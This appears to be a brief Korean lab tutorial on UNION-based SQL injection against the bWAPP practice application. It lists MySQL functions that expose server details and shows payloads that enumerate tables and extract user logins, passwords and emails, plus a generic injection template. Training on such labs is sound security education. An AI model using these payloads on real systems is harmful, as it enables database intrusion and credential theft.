[SQL Injection] ③

함수	설명
@@version	DB 서버의 운영체제 정보
@@datadir	서버 내의 DB 디렉토리
database()	DB 이름
user()	현재 사용자 아이디
system_user()	최고 권한 아이디

→ ms' union select all 1,user(),@@version,database(),@@datadir,6,7#

→ ms' union select all 1,table_name,3,4,5,6,7 from information_schema.tables#

→ information_schema의 테이블 목록 검색

→ bWAPP라는 DB의 테이블 목록이다. 이곳에서 users라는 테이블의 정보를 빼내보자.

→ users 테이블의 필드 정보

→ ms' union select all 1,login,password,email,admin,6,7 from bWAPP.users#

→ [검색어]' union select all [컬럼] from [DB_NAME].[TABLE_NAME]주석

→ 검색어 부분에 ms라고 입력한 이유는 검색 내용을 최소화 하기 위해 아무 값도 나오지 않는 단어를 입력한 것

→ 컬럼 부분에 테이블의 필드 정보를 입력한다.

→ ms' union select all 1,concat(login,password),3,4,5,6,7 from bWAPP.users#

→ concat이라는 명령어로 한 컬럼에 여러 정보를 볼 수 있다.